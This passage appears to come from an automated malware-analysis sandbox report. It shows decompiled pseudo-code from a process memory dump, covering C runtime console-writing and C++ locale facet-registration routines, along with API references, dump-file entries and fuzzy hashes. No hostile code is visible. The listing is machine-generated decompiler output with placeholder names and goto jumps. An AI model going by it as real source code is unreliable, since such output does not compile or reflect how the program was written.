                                                                                                							__eflags =  *((intOrPtr*)(_t188 + _t253 * 2)) - _t243;
                                                                                                							if( *((intOrPtr*)(_t188 + _t253 * 2)) >= _t243) {
                                                                                                								_push(1);
                                                                                                								_push(_t269);
                                                                                                								goto L30;
                                                                                                							} else {
                                                                                                								_t202 = _t269 + 1;
                                                                                                								_v56 = _t202;
                                                                                                								__eflags = _t202 - _v104;
                                                                                                								if(_t202 >= _v104) {
                                                                                                									_t263 = _v84;
                                                                                                									_t255 = _v80;
                                                                                                									 *((char*)(_t255 +  *((intOrPtr*)(0xfd10d8 + _t263 * 4)) + 0x2e)) = _v33;
                                                                                                									 *(_t255 +  *((intOrPtr*)(0xfd10d8 + _t263 * 4)) + 0x2d) =  *(_t255 +  *((intOrPtr*)(0xfd10d8 + _t263 * 4)) + 0x2d) | 0x00000004;
                                                                                                									_t283 = _t280 + 1;
                                                                                                									goto L45;
                                                                                                								} else {
                                                                                                									_t206 = E00FA62A9( &_v76, _t269, 2);
                                                                                                									_t290 = _t289 + 0xc;
                                                                                                									__eflags = _t206 - 0xffffffff;
                                                                                                									if(_t206 == 0xffffffff) {
                                                                                                										goto L52;
                                                                                                									} else {
                                                                                                										_t269 = _v56;
                                                                                                										goto L31;
                                                                                                									}
                                                                                                								}
                                                                                                							}
                                                                                                						} else {
                                                                                                							_t263 = _t263 & 0x000000fb;
                                                                                                							_v24 =  *((intOrPtr*)(_t252 + _t186 + 0x2e));
                                                                                                							_v23 =  *_t269;
                                                                                                							_push(2);
                                                                                                							 *(_t252 + _v52 + 0x2d) = _t263;
                                                                                                							_push( &_v24);
                                                                                                							L30:
                                                                                                							_push( &_v76);
                                                                                                							_t190 = E00FA62A9();
                                                                                                							_t290 = _t289 + 0xc;
                                                                                                							__eflags = _t190 - 0xffffffff;
                                                                                                							if(_t190 == 0xffffffff) {
                                                                                                								goto L52;
                                                                                                							} else {
                                                                                                								goto L31;
                                                                                                							}
                                                                                                						}
                                                                                                						goto L53;
                                                                                                					}
                                                                                                				}
                                                                                                				L53:
                                                                                                				if(__eflags != 0) {
                                                                                                					_t183 = _v72;
                                                                                                					_t167 = _t183 + 0x350;
                                                                                                					 *_t167 =  *(_t183 + 0x350) & 0xfffffffd;
                                                                                                					__eflags =  *_t167;
                                                                                                				}
                                                                                                				__eflags = _v8 ^ _t288;
                                                                                                				asm("movsd");
                                                                                                				asm("movsd");
                                                                                                				asm("movsd");
                                                                                                				return E00F80D7F(_v8 ^ _t288, _t263);
                                                                                                			}




















































































                                                                                                0x00fb18bb
                                                                                                0x00fb18c2
                                                                                                0x00fb18c5
                                                                                                0x00fb18ca
                                                                                                0x00fb18d2
                                                                                                0x00fb18d5
                                                                                                0x00fb18d9
                                                                                                0x00fb18dc
                                                                                                0x00fb18e6
                                                                                                0x00fb18f0
                                                                                                0x00fb18f2
                                                                                                0x00fb18f5
                                                                                                0x00fb18f8
                                                                                                0x00fb18fe
                                                                                                0x00fb1900
                                                                                                0x00fb1907
                                                                                                0x00fb1914
                                                                                                0x00fb1915
                                                                                                0x00fb1918
                                                                                                0x00fb191b
                                                                                                0x00fb191c
                                                                                                0x00fb191d
                                                                                                0x00fb1920
                                                                                                0x00fb1925
                                                                                                0x00fb1c31
                                                                                                0x00fb1c31
                                                                                                0x00fb192b
                                                                                                0x00fb192b
                                                                                                0x00fb192e
                                                                                                0x00fb1930
                                                                                                0x00fb1936
                                                                                                0x00fb1939
                                                                                                0x00fb1940
                                                                                                0x00fb1947
                                                                                                0x00fb1950
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00fb1956
                                                                                                0x00fb195c
                                                                                                0x00fb195e
                                                                                                0x00fb1960
                                                                                                0x00fb1963
                                                                                                0x00fb1968
                                                                                                0x00fb196c
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00fb196c
                                                                                                0x00fb1971
                                                                                                0x00fb1974
                                                                                                0x00fb1976
                                                                                                0x00fb197b
                                                                                                0x00fb1a2d
                                                                                                0x00fb1a2e
                                                                                                0x00fb1a31
                                                                                                0x00fb1a33
                                                                                                0x00fb1be1
                                                                                                0x00fb1be3
                                                                                                0x00000000
                                                                                                0x00fb1be5
                                                                                                0x00fb1be5
                                                                                                0x00fb1be8
                                                                                                0x00fb1beb
                                                                                                0x00fb1bf4
                                                                                                0x00fb1bf7
                                                                                                0x00fb1bf8
                                                                                                0x00fb1bfc
                                                                                                0x00fb1bff
                                                                                                0x00fb1bff
                                                                                                0x00000000
                                                                                                0x00fb1c03
                                                                                                0x00fb1a39
                                                                                                0x00fb1a39
                                                                                                0x00fb1a3e
                                                                                                0x00fb1a41
                                                                                                0x00fb1a47
                                                                                                0x00fb1a4d
                                                                                                0x00fb1a56
                                                                                                0x00fb1a59
                                                                                                0x00fb1a59
                                                                                                0x00fb1a5a
                                                                                                0x00fb1a5b
                                                                                                0x00fb1a5e
                                                                                                0x00fb1a5f
                                                                                                0x00000000
                                                                                                0x00fb1a5f
                                                                                                0x00fb1981
                                                                                                0x00fb1990
                                                                                                0x00fb1991
                                                                                                0x00fb1994
                                                                                                0x00fb1996
                                                                                                0x00fb199b
                                                                                                0x00fb1bac
                                                                                                0x00fb1bae
                                                                                                0x00fb1bb0
                                                                                                0x00fb1bb3
                                                                                                0x00fb1bb8
                                                                                                0x00fb1bc1
                                                                                                0x00fb1bc4
                                                                                                0x00fb1bc5
                                                                                                0x00fb1bc9
                                                                                                0x00fb1bcc
                                                                                                0x00fb1bcf
                                                                                                0x00fb1bcf
                                                                                                0x00fb1bd3
                                                                                                0x00fb1bd3
                                                                                                0x00fb1bd3
                                                                                                0x00fb1bd6
                                                                                                0x00fb1bd6
                                                                                                0x00fb1bd6
                                                                                                0x00fb1bd8
                                                                                                0x00fb1bd8
                                                                                                0x00fb1bdc
                                                                                                0x00fb19a1
                                                                                                0x00fb19a1
                                                                                                0x00fb19a5
                                                                                                0x00fb19a7
                                                                                                0x00fb19aa
                                                                                                0x00fb19ad
                                                                                                0x00fb19b1
                                                                                                0x00fb19b2
                                                                                                0x00fb19b6
                                                                                                0x00fb19b6
                                                                                                0x00fb19b9
                                                                                                0x00fb19be
                                                                                                0x00fb19ca
                                                                                                0x00fb19cf
                                                                                                0x00fb19d2
                                                                                                0x00fb19d2
                                                                                                0x00fb19d7
                                                                                                0x00fb19d9
                                                                                                0x00fb19dc
                                                                                                0x00fb19de
                                                                                                0x00fb19e1
                                                                                                0x00fb19e4
                                                                                                0x00fb19e7
                                                                                                0x00fb19ef
                                                                                                0x00fb19f3
                                                                                                0x00fb19f7
                                                                                                0x00fb19f7
                                                                                                0x00fb19fd
                                                                                                0x00fb1a03
                                                                                                0x00fb1a06
                                                                                                0x00fb1a0e
                                                                                                0x00fb1a15
                                                                                                0x00fb1a19
                                                                                                0x00fb1a1a
                                                                                                0x00fb1a1d
                                                                                                0x00fb1a1e
                                                                                                0x00fb1a62
                                                                                                0x00fb1a62
                                                                                                0x00fb1a66
                                                                                                0x00fb1a67
                                                                                                0x00fb1a6c
                                                                                                0x00fb1a72
                                                                                                0x00000000
                                                                                                0x00fb1a78
                                                                                                0x00fb1a7c
                                                                                                0x00fb1b05
                                                                                                0x00fb1b0c
                                                                                                0x00fb1b14
                                                                                                0x00fb1b1c
                                                                                                0x00fb1b21
                                                                                                0x00fb1b24
                                                                                                0x00fb1b29
                                                                                                0x00000000
                                                                                                0x00fb1b2f
                                                                                                0x00fb1b44
                                                                                                0x00fb1c28
                                                                                                0x00fb1c2e
                                                                                                0x00000000
                                                                                                0x00fb1b4a
                                                                                                0x00fb1b53
                                                                                                0x00fb1b55
                                                                                                0x00fb1b5b
                                                                                                0x00000000
                                                                                                0x00fb1b61
                                                                                                0x00fb1b65
                                                                                                0x00fb1b9b
                                                                                                0x00fb1b9e
                                                                                                0x00000000
                                                                                                0x00fb1ba4
                                                                                                0x00fb1ba4
                                                                                                0x00000000
                                                                                                0x00fb1ba4
                                                                                                0x00fb1b67
                                                                                                0x00fb1b69
                                                                                                0x00fb1b6b
                                                                                                0x00fb1b84
                                                                                                0x00000000
                                                                                                0x00fb1b8a
                                                                                                0x00fb1b8e
                                                                                                0x00000000
                                                                                                0x00fb1b94
                                                                                                0x00fb1b94
                                                                                                0x00fb1b97
                                                                                                0x00fb1b98
                                                                                                0x00000000
                                                                                                0x00fb1b98
                                                                                                0x00fb1b8e
                                                                                                0x00fb1b84
                                                                                                0x00fb1b65
                                                                                                0x00fb1b5b
                                                                                                0x00fb1b44
                                                                                                0x00fb1b29
                                                                                                0x00fb1a72
                                                                                                0x00fb199b
                                                                                                0x00000000
                                                                                                0x00fb1a83
                                                                                                0x00fb1a83
                                                                                                0x00fb1a86
                                                                                                0x00fb1a8a
                                                                                                0x00fb1a8d
                                                                                                0x00fb1aaf
                                                                                                0x00fb1ab2
                                                                                                0x00fb1ab7
                                                                                                0x00fb1abb
                                                                                                0x00fb1abf
                                                                                                0x00fb1aed
                                                                                                0x00fb1aef
                                                                                                0x00000000
                                                                                                0x00fb1ac1
                                                                                                0x00fb1ac1
                                                                                                0x00fb1ac4
                                                                                                0x00fb1ac7
                                                                                                0x00fb1aca
                                                                                                0x00fb1c05
                                                                                                0x00fb1c08
                                                                                                0x00fb1c15
                                                                                                0x00fb1c20
                                                                                                0x00fb1c25
                                                                                                0x00000000
                                                                                                0x00fb1ad0
                                                                                                0x00fb1ad7
                                                                                                0x00fb1adc
                                                                                                0x00fb1adf
                                                                                                0x00fb1ae2
                                                                                                0x00000000
                                                                                                0x00fb1ae8
                                                                                                0x00fb1ae8
                                                                                                0x00000000
                                                                                                0x00fb1ae8
                                                                                                0x00fb1ae2
                                                                                                0x00fb1aca
                                                                                                0x00fb1a8f
                                                                                                0x00fb1a93
                                                                                                0x00fb1a96
                                                                                                0x00fb1a9b
                                                                                                0x00fb1aa1
                                                                                                0x00fb1aa3
                                                                                                0x00fb1aaa
                                                                                                0x00fb1af0
                                                                                                0x00fb1af3
                                                                                                0x00fb1af4
                                                                                                0x00fb1af9
                                                                                                0x00fb1afc
                                                                                                0x00fb1aff
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00fb1aff
                                                                                                0x00000000
                                                                                                0x00fb1a8d
                                                                                                0x00fb192e
                                                                                                0x00fb1c34
                                                                                                0x00fb1c34
                                                                                                0x00fb1c36
                                                                                                0x00fb1c39
                                                                                                0x00fb1c39
                                                                                                0x00fb1c39
                                                                                                0x00fb1c39
                                                                                                0x00fb1c4b
                                                                                                0x00fb1c4d
                                                                                                0x00fb1c4e
                                                                                                0x00fb1c4f
                                                                                                0x00fb1c5b

                                                                                                APIs
                                                                                                • GetConsoleCP.KERNEL32(00000004,?,00000000), ref: 00FB18F8
                                                                                                • __fassign.LIBCMT ref: 00FB1AD7
                                                                                                • __fassign.LIBCMT ref: 00FB1AF4
                                                                                                • WriteFile.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00FB1B3C
                                                                                                • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00FB1B7C
                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00FB1C28
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: FileWrite__fassign$ConsoleErrorLast
                                                                                                • String ID:
                                                                                                • API String ID: 4031098158-0
                                                                                                • Opcode ID: 59162267f3d589f6f1e20eabe37aa323b3aad1e6ece02311677572a9cb157986
                                                                                                • Instruction ID: 535fc6f537706b217f6c82135f8cacac1d80ff9f96f25b10526a9d01b471f42b
                                                                                                • Opcode Fuzzy Hash: 59162267f3d589f6f1e20eabe37aa323b3aad1e6ece02311677572a9cb157986
                                                                                                • Instruction Fuzzy Hash: 06D1BCB1D0124C9FCF15CFA9C8909EDBBB5BF49310F28416AE855FB242E631AA46DF50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 95%
                                                                                                			E00F7B370(void* _a4) {
                                                                                                				char _v8;
                                                                                                				char _v16;
                                                                                                				signed int _v20;
                                                                                                				char _v24;
                                                                                                				intOrPtr* _v28;
                                                                                                				char _v32;
                                                                                                				char _v84;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				void* __ebp;
                                                                                                				signed int _t58;
                                                                                                				intOrPtr* _t62;
                                                                                                				intOrPtr _t65;
                                                                                                				void* _t78;
                                                                                                				signed int _t83;
                                                                                                				signed int _t84;
                                                                                                				signed int _t86;
                                                                                                				intOrPtr* _t89;
                                                                                                				intOrPtr _t93;
                                                                                                				intOrPtr _t99;
                                                                                                				intOrPtr* _t104;
                                                                                                				intOrPtr* _t106;
                                                                                                				signed int _t108;
                                                                                                				char _t110;
                                                                                                				signed int _t111;
                                                                                                				void* _t112;
                                                                                                				void* _t113;
                                                                                                
                                                                                                				_push(0xffffffff);
                                                                                                				_push(0xfb68e4);
                                                                                                				_push( *[fs:0x0]);
                                                                                                				_t113 = _t112 - 0x44;
                                                                                                				_t58 =  *0xfcf00c; // 0xfd8fa683
                                                                                                				_push(_t58 ^ _t111);
                                                                                                				 *[fs:0x0] =  &_v16;
                                                                                                				_t86 = 0;
                                                                                                				_v20 = 0;
                                                                                                				E00F856E6( &_v32, 0);
                                                                                                				_v8 = 0;
                                                                                                				_t108 =  *0xfd27b0;
                                                                                                				_t62 =  *0xfd1534; // 0x0
                                                                                                				_v28 = _t62;
                                                                                                				if(_t108 == 0) {
                                                                                                					E00F856E6( &_v24, _t108);
                                                                                                					_v8 = 1;
                                                                                                					if( *0xfd27b0 == _t108) {
                                                                                                						_t83 =  *0xfd0954; // 0x0
                                                                                                						_t84 = _t83 + 1;
                                                                                                						 *0xfd0954 = _t84;
                                                                                                						 *0xfd27b0 = _t84;
                                                                                                					}
                                                                                                					_v8 = 0;
                                                                                                					E00F8573E( &_v24);
                                                                                                					_t108 =  *0xfd27b0;
                                                                                                				}
                                                                                                				_t11 = _a4 + 4; // 0xffff7332
                                                                                                				_t93 =  *_t11;
                                                                                                				if(_t108 >=  *((intOrPtr*)(_t93 + 0xc))) {
                                                                                                					_t104 = 0;
                                                                                                					goto L8;
                                                                                                				} else {
                                                                                                					_t104 =  *((intOrPtr*)( *((intOrPtr*)(_t93 + 8)) + _t108 * 4));
                                                                                                					if(_t104 != 0) {
                                                                                                						L26:
                                                                                                						_v8 = 0xffffffff;
                                                                                                						E00F8573E( &_v32);
                                                                                                						 *[fs:0x0] = _v16;
                                                                                                						return _t104;
                                                                                                					} else {
                                                                                                						L8:
                                                                                                						if( *((char*)(_t93 + 0x14)) == 0) {
                                                                                                							L11:
                                                                                                							if(_t104 != 0) {
                                                                                                								goto L26;
                                                                                                							}
                                                                                                							L12:
                                                                                                							_t65 = _v28;
                                                                                                							if(_t65 == 0) {
                                                                                                								_t106 = LocalAlloc(0x40, 0xc);
                                                                                                								_v28 = _t106;
                                                                                                								_v8 = 2;
                                                                                                								if(_t106 == 0) {
                                                                                                									_t104 = 0;
                                                                                                								} else {
                                                                                                									_t25 = _a4 + 4; // 0xffff7332
                                                                                                									_t99 =  *_t25;
                                                                                                									if(_t99 == 0) {
                                                                                                										_t72 = 0xfc76d9;
                                                                                                									} else {
                                                                                                										_t72 =  *((intOrPtr*)(_t99 + 0x18));
                                                                                                										if( *((intOrPtr*)(_t99 + 0x18)) == 0) {
                                                                                                											_t27 = _t99 + 0x1c; // 0xffff734e
                                                                                                											_t72 = _t27;
                                                                                                										}
                                                                                                									}
                                                                                                									E00F78E20( &_v84, _t108, _t72);
                                                                                                									_v8 = 3;
                                                                                                									_v20 = 1;
                                                                                                									 *_t106 = 0xfb83d0;
                                                                                                									_v8 = 4;
                                                                                                									 *_t106 = 0xfb83e0;
                                                                                                									 *((intOrPtr*)(_t106 + 4)) = 0;
                                                                                                									_v8 = 5;
                                                                                                									_t34 = _t106 + 8; // 0x8
                                                                                                									_t89 = _t34;
                                                                                                									 *_t106 = 0xfb946c;
                                                                                                									 *_t89 = 0;
                                                                                                									_v8 = 7;
                                                                                                									_t110 = E00FA14C0(_t89, _t106, _t108);
                                                                                                									_a4 = _t110;
                                                                                                									_v20 = 3;
                                                                                                									if(_t89 !=  &_a4) {
                                                                                                										E00F9BD1B( *_t89);
                                                                                                										_t113 = _t113 + 4;
                                                                                                										 *_t89 = _t110;
                                                                                                										_t110 = 0;
                                                                                                										_a4 = 0;
                                                                                                									}
                                                                                                									_v20 = 3;
                                                                                                									_t86 = 1;
                                                                                                									_v20 = 3;
                                                                                                									_v8 = 6;
                                                                                                									E00F9BD1B(_t110);
                                                                                                									_t113 = _t113 + 4;
                                                                                                									_v8 = 3;
                                                                                                								}
                                                                                                								_v8 = 0;
                                                                                                								if((_t86 & 0x00000001) != 0) {
                                                                                                									_v20 = _t86 & 0xfffffffe;
                                                                                                									E00F79300();
                                                                                                								}
                                                                                                								_a4 = _t104;
                                                                                                								_v8 = 9;
                                                                                                								E00F85472(_t104);
                                                                                                								 *((intOrPtr*)( *_t104 + 4))();
                                                                                                								 *0xfd1534 = _t104;
                                                                                                								_a4 = 0;
                                                                                                								_v8 = 0;
                                                                                                							} else {
                                                                                                								_t104 = _t65;
                                                                                                							}
                                                                                                							goto L26;
                                                                                                						}
                                                                                                						_t78 = E00F8549E();
                                                                                                						if(_t108 >=  *((intOrPtr*)(_t78 + 0xc))) {
                                                                                                							goto L12;
                                                                                                						}
                                                                                                						_t104 =  *((intOrPtr*)( *((intOrPtr*)(_t78 + 8)) + _t108 * 4));
                                                                                                						goto L11;
                                                                                                					}
                                                                                                				}
                                                                                                			}































                                                                                                0x00f7b373
                                                                                                0x00f7b375
                                                                                                0x00f7b380
                                                                                                0x00f7b381
                                                                                                0x00f7b387
                                                                                                0x00f7b38e
                                                                                                0x00f7b392
                                                                                                0x00f7b398
                                                                                                0x00f7b39e
                                                                                                0x00f7b3a1
                                                                                                0x00f7b3a6
                                                                                                0x00f7b3a9
                                                                                                0x00f7b3af
                                                                                                0x00f7b3b4
                                                                                                0x00f7b3b9
                                                                                                0x00f7b3bf
                                                                                                0x00f7b3c4
                                                                                                0x00f7b3ce
                                                                                                0x00f7b3d0
                                                                                                0x00f7b3d5
                                                                                                0x00f7b3d6
                                                                                                0x00f7b3db
                                                                                                0x00f7b3db
                                                                                                0x00f7b3e0
                                                                                                0x00f7b3e7
                                                                                                0x00f7b3ec
                                                                                                0x00f7b3ec
                                                                                                0x00f7b3f5
                                                                                                0x00f7b3f5
                                                                                                0x00f7b3fb
                                                                                                0x00f7b40d
                                                                                                0x00000000
                                                                                                0x00f7b3fd
                                                                                                0x00f7b400
                                                                                                0x00f7b405
                                                                                                0x00f7b547
                                                                                                0x00f7b547
                                                                                                0x00f7b551
                                                                                                0x00f7b55b
                                                                                                0x00f7b569
                                                                                                0x00f7b40b
                                                                                                0x00f7b40f
                                                                                                0x00f7b413
                                                                                                0x00f7b425
                                                                                                0x00f7b427
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f7b42d
                                                                                                0x00f7b42d
                                                                                                0x00f7b432
                                                                                                0x00f7b445
                                                                                                0x00f7b447
                                                                                                0x00f7b44a
                                                                                                0x00f7b450
                                                                                                0x00f7b503
                                                                                                0x00f7b456
                                                                                                0x00f7b459
                                                                                                0x00f7b459
                                                                                                0x00f7b45e
                                                                                                0x00f7b46c
                                                                                                0x00f7b460
                                                                                                0x00f7b460
                                                                                                0x00f7b465
                                                                                                0x00f7b467
                                                                                                0x00f7b467
                                                                                                0x00f7b467
                                                                                                0x00f7b465
                                                                                                0x00f7b475
                                                                                                0x00f7b47a
                                                                                                0x00f7b47e
                                                                                                0x00f7b485
                                                                                                0x00f7b48b
                                                                                                0x00f7b492
                                                                                                0x00f7b498
                                                                                                0x00f7b49f
                                                                                                0x00f7b4a6
                                                                                                0x00f7b4a6
                                                                                                0x00f7b4a9
                                                                                                0x00f7b4af
                                                                                                0x00f7b4b5
                                                                                                0x00f7b4be
                                                                                                0x00f7b4c3
                                                                                                0x00f7b4c6
                                                                                                0x00f7b4cf
                                                                                                0x00f7b4d3
                                                                                                0x00f7b4d8
                                                                                                0x00f7b4db
                                                                                                0x00f7b4dd
                                                                                                0x00f7b4df
                                                                                                0x00f7b4df
                                                                                                0x00f7b4e7
                                                                                                0x00f7b4ea
                                                                                                0x00f7b4ed
                                                                                                0x00f7b4f0
                                                                                                0x00f7b4f5
                                                                                                0x00f7b4fa
                                                                                                0x00f7b4fd
                                                                                                0x00f7b4fd
                                                                                                0x00f7b505
                                                                                                0x00f7b50f
                                                                                                0x00f7b517
                                                                                                0x00f7b51a
                                                                                                0x00f7b51a
                                                                                                0x00f7b51f
                                                                                                0x00f7b522
                                                                                                0x00f7b527
                                                                                                0x00f7b533
                                                                                                0x00f7b536
                                                                                                0x00f7b53c
                                                                                                0x00f7b543
                                                                                                0x00f7b434
                                                                                                0x00f7b434
                                                                                                0x00f7b434
                                                                                                0x00000000
                                                                                                0x00f7b432
                                                                                                0x00f7b415
                                                                                                0x00f7b41d
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f7b422
                                                                                                0x00000000
                                                                                                0x00f7b422
                                                                                                0x00f7b405

                                                                                                APIs
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00F7B3A1
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00F7B3BF
                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00F7B3E7
                                                                                                • LocalAlloc.KERNEL32(00000040,0000000C,00000000,FD8FA683,00000000,00000000,00000000), ref: 00F7B43F
                                                                                                • std::_Facet_Register.LIBCPMT ref: 00F7B527
                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00F7B551
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_LocalRegister
                                                                                                • String ID:
                                                                                                • API String ID: 3931714976-0
                                                                                                • Opcode ID: b3a9dc88ee9d2435a057bf09a06760709d5a3e58b7bb3dcf8f858ecbec3928f3
                                                                                                • Instruction ID: f1dec4bbb87f8f82f4cc8421f2f3cb7985d83a2280de2c7437ca1d1246819e01
                                                                                                • Opcode Fuzzy Hash: b3a9dc88ee9d2435a057bf09a06760709d5a3e58b7bb3dcf8f858ecbec3928f3
                                                                                                • Instruction Fuzzy Hash: EC51D3B1D05248DFDB11DF68C8807EEBBB4FF51350F24815AE819AB392D7749A05EB82
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 94%
                                                                                                			E00F7B570(void* _a4) {
                                                                                                				char _v8;
                                                                                                				char _v16;
                                                                                                				signed int _v20;
                                                                                                				char _v24;
                                                                                                				intOrPtr* _v28;
                                                                                                				char _v32;
                                                                                                				char _v84;
                                                                                                				void* __esi;
                                                                                                				void* __ebp;
                                                                                                				signed int _t49;
                                                                                                				intOrPtr* _t53;
                                                                                                				intOrPtr _t56;
                                                                                                				void* _t65;
                                                                                                				signed int _t70;
                                                                                                				signed int _t71;
                                                                                                				signed int _t73;
                                                                                                				intOrPtr _t78;
                                                                                                				intOrPtr _t84;
                                                                                                				signed int _t89;
                                                                                                				intOrPtr* _t92;
                                                                                                				intOrPtr* _t94;
                                                                                                				signed int _t95;
                                                                                                
                                                                                                				_push(0xffffffff);
                                                                                                				_push(0xfb6950);
                                                                                                				_push( *[fs:0x0]);
                                                                                                				_t49 =  *0xfcf00c; // 0xfd8fa683
                                                                                                				_push(_t49 ^ _t95);
                                                                                                				 *[fs:0x0] =  &_v16;
                                                                                                				_t73 = 0;
                                                                                                				_v20 = 0;
                                                                                                				E00F856E6( &_v32, 0);
                                                                                                				_v8 = 0;
                                                                                                				_t89 =  *0xfd27ac;
                                                                                                				_t53 =  *0xfd1530; // 0x0
                                                                                                				_v28 = _t53;
                                                                                                				if(_t89 == 0) {
                                                                                                					E00F856E6( &_v24, _t89);
                                                                                                					_v8 = 1;
                                                                                                					if( *0xfd27ac == _t89) {
                                                                                                						_t70 =  *0xfd0954; // 0x0
                                                                                                						_t71 = _t70 + 1;
                                                                                                						 *0xfd0954 = _t71;
                                                                                                						 *0xfd27ac = _t71;
                                                                                                					}
                                                                                                					_v8 = 0;
                                                                                                					E00F8573E( &_v24);
                                                                                                					_t89 =  *0xfd27ac;
                                                                                                				}
                                                                                                				_t11 = _a4 + 4; // 0xffff768e
                                                                                                				_t78 =  *_t11;
                                                                                                				if(_t89 >=  *((intOrPtr*)(_t78 + 0xc))) {
                                                                                                					_t92 = 0;
                                                                                                					goto L8;
                                                                                                				} else {
                                                                                                					_t92 =  *((intOrPtr*)( *((intOrPtr*)(_t78 + 8)) + _t89 * 4));
                                                                                                					if(_t92 != 0) {
                                                                                                						L24:
                                                                                                						_v8 = 0xffffffff;
                                                                                                						E00F8573E( &_v32);
                                                                                                						 *[fs:0x0] = _v16;
                                                                                                						return _t92;
                                                                                                					} else {
                                                                                                						L8:
                                                                                                						if( *((char*)(_t78 + 0x14)) == 0) {
                                                                                                							L11:
                                                                                                							if(_t92 != 0) {
                                                                                                								goto L24;
                                                                                                							}
                                                                                                							L12:
                                                                                                							_t56 = _v28;
                                                                                                							if(_t56 == 0) {
                                                                                                								_t94 = LocalAlloc(0x40, 8);
                                                                                                								_v28 = _t94;
                                                                                                								_v8 = 2;
                                                                                                								if(_t94 == 0) {
                                                                                                									_t92 = 0;
                                                                                                								} else {
                                                                                                									_t25 = _a4 + 4; // 0xffff768e
                                                                                                									_t84 =  *_t25;
                                                                                                									if(_t84 == 0) {
                                                                                                										_t63 = 0xfc76d9;
                                                                                                									} else {
                                                                                                										_t63 =  *((intOrPtr*)(_t84 + 0x18));
                                                                                                										if( *((intOrPtr*)(_t84 + 0x18)) == 0) {
                                                                                                											_t27 = _t84 + 0x1c; // 0xffff76aa
                                                                                                											_t63 = _t27;
                                                                                                										}
                                                                                                									}
                                                                                                									E00F78E20( &_v84, _t94, _t63);
                                                                                                									_v8 = 3;
                                                                                                									_t73 = 1;
                                                                                                									_v20 = 1;
                                                                                                									 *_t94 = 0xfb83d0;
                                                                                                									_v8 = 4;
                                                                                                									 *_t94 = 0xfb83e0;
                                                                                                									 *((intOrPtr*)(_t94 + 4)) = 0;
                                                                                                									_v8 = 5;
                                                                                                									 *_t94 = 0xfb94bc;
                                                                                                									_v8 = 3;
                                                                                                								}
                                                                                                								_v8 = 0;
                                                                                                								if((_t73 & 0x00000001) != 0) {
                                                                                                									_v20 = _t73 & 0xfffffffe;
                                                                                                									E00F79300();
                                                                                                								}
                                                                                                								_a4 = _t92;
                                                                                                								_v8 = 7;
                                                                                                								E00F85472(_t92);
                                                                                                								 *((intOrPtr*)( *_t92 + 4))();
                                                                                                								 *0xfd1530 = _t92;
                                                                                                								_a4 = 0;
                                                                                                								_v8 = 0;
                                                                                                							} else {
                                                                                                								_t92 = _t56;
                                                                                                							}
                                                                                                							goto L24;
                                                                                                						}
                                                                                                						_t65 = E00F8549E();
                                                                                                						if(_t89 >=  *((intOrPtr*)(_t65 + 0xc))) {
                                                                                                							goto L12;
                                                                                                						}
                                                                                                						_t92 =  *((intOrPtr*)( *((intOrPtr*)(_t65 + 8)) + _t89 * 4));
                                                                                                						goto L11;
                                                                                                					}
                                                                                                				}
                                                                                                			}

























                                                                                                0x00f7b573
                                                                                                0x00f7b575
                                                                                                0x00f7b580
                                                                                                0x00f7b587
                                                                                                0x00f7b58e
                                                                                                0x00f7b592
                                                                                                0x00f7b598
                                                                                                0x00f7b59e
                                                                                                0x00f7b5a1
                                                                                                0x00f7b5a6
                                                                                                0x00f7b5a9
                                                                                                0x00f7b5af
                                                                                                0x00f7b5b4
                                                                                                0x00f7b5b9
                                                                                                0x00f7b5bf
                                                                                                0x00f7b5c4
                                                                                                0x00f7b5ce
                                                                                                0x00f7b5d0
                                                                                                0x00f7b5d5
                                                                                                0x00f7b5d6
                                                                                                0x00f7b5db
                                                                                                0x00f7b5db
                                                                                                0x00f7b5e0
                                                                                                0x00f7b5e7
                                                                                                0x00f7b5ec
                                                                                                0x00f7b5ec
                                                                                                0x00f7b5f5
                                                                                                0x00f7b5f5
                                                                                                0x00f7b5fb
                                                                                                0x00f7b60d
                                                                                                0x00000000
                                                                                                0x00f7b5fd
                                                                                                0x00f7b600
                                                                                                0x00f7b605
                                                                                                0x00f7b6f3
                                                                                                0x00f7b6f3
                                                                                                0x00f7b6fd
                                                                                                0x00f7b707
                                                                                                0x00f7b715
                                                                                                0x00f7b60b
                                                                                                0x00f7b60f
                                                                                                0x00f7b613
                                                                                                0x00f7b625
